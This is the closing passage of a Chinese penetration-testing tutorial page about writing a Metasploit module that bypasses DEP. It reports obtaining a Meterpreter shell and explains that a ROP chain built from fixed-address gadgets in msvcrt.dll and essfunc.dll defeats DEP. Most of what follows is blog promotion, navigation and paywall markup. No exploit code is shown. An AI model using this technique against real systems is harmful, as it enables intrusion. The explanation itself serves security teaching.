class="line-number">47</span><br><span class="line-number">48</span><br><span class="line-number">49</span><br><span class="line-number">50</span><br><span 
class="line-number">51</span><br><span class="line-number">52</span><br><span class="line-number">53</span><br><span class="line-number">54</span><br><span class="line-number">55</span><br><span class="line-number">56</span><br><span class="line-number">57</span><br><span class="line-number">58</span><br><span class="line-number">59</span><br><span class="line-number">60</span><br><span class="line-number">61</span><br><span class="line-number">62</span><br></div></div><p>成功拿到Meterpreter的Shell。所以，对我们来说，仅靠系统的DEP保护并没有什么用：本例的ROP链完全由msvcrt.dll、essfunc.dll等模块中固定地址的指令片段拼接而成，只要这些模块的加载地址可以预测，DEP就会被ROP绕过。</p> <h2 id="写在最后"><a href="#写在最后" class="header-anchor">#</a> 写在最后</h2> <blockquote><p>如果你觉得冰河写的还不错，请微信搜索并关注「 <strong>冰河技术</strong> 」微信公众号，跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术，「 <strong>冰河技术</strong> 」微信公众号更新了大量技术专题，每一篇技术文章干货满满！不少读者已经通过阅读「 <strong>冰河技术</strong> 」微信公众号文章，吊打面试官，成功跳槽到大厂；也有不少读者实现了技术上的飞跃，成为公司的技术骨干！如果你也想像他们一样提升自己的能力，实现技术能力的飞跃，进大厂，升职加薪，那就关注「 <strong>冰河技术</strong> 」微信公众号吧，每天更新超硬核技术干货，让你对如何提升技术能力不再迷茫！</p></blockquote> <p><img alt="" data-src="https://img-blog.csdnimg.cn/20200906013715889.png" loading="lazy" class="lazy"></p></div> <footer class="page-edit"><div class="edit-link"><a href="https://github.com/binghe001/BingheGuide/edit/master/docs/md/hack/tools/2022-04-17-025-使用Metasploit编写绕过DEP渗透模块.md" target="_blank" rel="noopener noreferrer">在 GitHub 上编辑此页</a> <span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></div> <div class="last-updated"><span class="prefix">上次更新: </span> <span class="time">2022/5/23</span></div></footer> <div class="page-nav"><p class="inner"><span class="prev">
                可以<b>手机看</b>或分享至<b>朋友圈</b></div></div></div></div> <div class="option-box"><img src="/images/system/toggle.png" width="30px" class="nozoom"> <span class="show-txt">左栏</span></div> <div class="option-box"><img src="/images/system/xingqiu.png" width="25px" class="nozoom"> <span class="show-txt">星球</span> <div class="toc-container"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="text-align:center"><span style="font-size:0.8rem;font-weight:bold;">实战项目<span style="font-size:8px;color:red;">「SpringCloud Alibaba实战项目」</span>、专属电子书、问题解答、简历指导、技术分享、晋升指导、视频课程</span> <img height="180px" src="/images/personal/xingqiu.png" style="margin:10px;"> <b>知识星球</b>：冰河技术
            </div></div></div></div> <div class="option-box"><img src="/images/system/wexin4.png" width="25px" class="nozoom"> <span class="show-txt">读者群</span> <div class="toc-container"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="text-align:center"><span style="font-size:0.8rem;font-weight:bold;">添加冰河微信<span style="color:red;">(hacker_binghe)</span>进冰河技术学习交流圈「无任何套路」</span> <img src="/images/personal/hacker_binghe.jpg" height="180px" style="margin:10px;">
                PS：添加时请备注<b>读者加群</b>，谢谢！
              </div></div></div></div> <div class="option-box"><img src="/images/system/download-2.png" width="25px" class="nozoom"> <span class="show-txt">下资料</span> <div class="toc-container"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="text-align:center"><span style="font-size:0.8rem;font-weight:bold;">扫描公众号，回复<span style="color:red;">“1024”</span>下载<span style="color:red;">100GB+</span>学习技术资料、PDF书籍、实战项目、简历模板等「无任何套路」</span> <img src="/images/personal/qrcode.png" height="180px" style="margin:10px;"> <b>公众号:</b> 冰河技术
              </div></div></div></div> <div class="option-box"><img src="/images/system/heart-1.png" width="25px" class="nozoom"> <span class="show-txt">赞赏我</span> <div class="toc-container"><div class="pos-box"><div class="icon-arrow"></div> <div class="scroll-box" style="text-align:center"><span style="font-size:0.8rem;font-weight:bold;">鼓励/支持/赞赏我</span> <img height="180px" src="/images/personal/encourage-head.png" style="margin:5px;"> <br>1. 不靠它生存但仍希望得到你的鼓励；
                <br>2. 时刻警醒自己保持技术人的初心；
              </div></div></div></div> <div title="Metasploit-Meterpreter-Shell信息收集相关的命令" class="option-box" style="padding-left:2px;text-align:center;"><a href="/md/hack/tools/2022-04-17-024-Metasploit-Meterpreter-Shell信息收集相关的命令.html"><img src="/images/system/pre2.png" width="30px" class="nozoom"> <span class="show-txt">上一篇</span></a></div> <div title="Metasploit渗透php-utility-belt程序" class="option-box" style="padding-left:2px;text-align:center;"><a href="/md/hack/tools/2022-04-17-026-Metasploit渗透php-utility-belt程序.html"><img src="/images/system/next2.png" width="30px" class="nozoom"> <span class="show-txt">下一篇</span></a></div></div>  <!----> </aside></div><div class="global-ui"><div class="read-more-wrap" style="display:none;position:absolute;bottom:0px;z-index:9999;width:100%;margin-top:-100px;font-family:PingFangSC-Regular, sans-serif;"><div id="read-more-mask" style="position: relative; height: 200px; background: -webkit-gradient(linear, 0 0%, 0 100%, from(rgba(255, 255, 255, 0)), to(rgb(255, 255, 255)));"></div> <a id="read-more-btn" target="_self" style="position: absolute; left: 50%; top: 70%; bottom: 30px; transform: translate(-50%, -50%); width: 160px; height: 36px; line-height: 36px; font-size: 15px; text-align: center; border: 1px solid rgb(222, 104, 109); color: rgb(222, 104, 109); background: rgb(255, 255, 255); cursor: pointer; border-radius: 6px;">阅读全文</a> <div id="btw-modal-wrap" style="display: none;"><div id="btw-mask" style="position: fixed; top: 0px; right: 0px; bottom: 0px; left: 0px; opacity: 0.7; z-index: 999; background: rgb(0, 0, 0);"></div> <div id="btw-modal" style="position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); width: 300px; text-align: center; font-size: 13px; background: rgb(255, 255, 255); border-radius: 10px; z-index: 9999; font-family: PingFangSC-Regular, sans-serif;"><span id="btw-modal-close-btn" style="position: absolute; top: 5px; right: 15px; line-height: 34px; font-size: 34px; cursor: pointer; opacity: 
0.2; z-index: 9999; color: rgb(0, 0, 0); background: none; border: none; outline: none;">×</span> <p id="btw-modal-header" style="margin-top: 40px; line-height: 1.8; font-size: 13px;">
                扫码或搜索：<span style="color: #E9405A; font-weight: bold;">冰河技术</span> <br>发送：<span id="fustack-token" class="token" style="color: #e9415a; font-weight: bold; font-size: 17px; margin-bottom: 45px;">290992</span> <br>即可<span style="color: #e9415a; font-weight: bold;">立即永久</span>解锁本站全部文章</p> <img src="/images/personal/qrcode.png" style="width: 180px; margin-top: 10px; margin-bottom: 30px; border: 8px solid rgb(230, 230, 230);"></div></div></div><div class="pay-read-more-wrap" style="display:none;position:absolute;bottom:0px;z-index:9999;width:100%;margin-top:-100px;font-family:PingFangSC-Regular, sans-serif;"><div id="pay-read-more-mask" style="position: relative; height: 200px; background: -webkit-gradient(linear, 0 0%, 0 100%, from(rgba(255, 255, 255, 0)), to(rgb(255, 255, 255)));"></div> <a id="pay-read-more-btn" target="_blank" style="position: absolute; left: 50%; top: 70%; bottom: 30px; transform: translate(-50%, -50%); width: 160px; height: 36px; line-height: 36px; font-size: 15px; text-align: center; border: 1px solid rgb(222, 104, 109); color: rgb(222, 104, 109); background: rgb(255, 255, 255); cursor: pointer; border-radius: 6px;">付费阅读</a></div></div></div>
  </body>
</html>
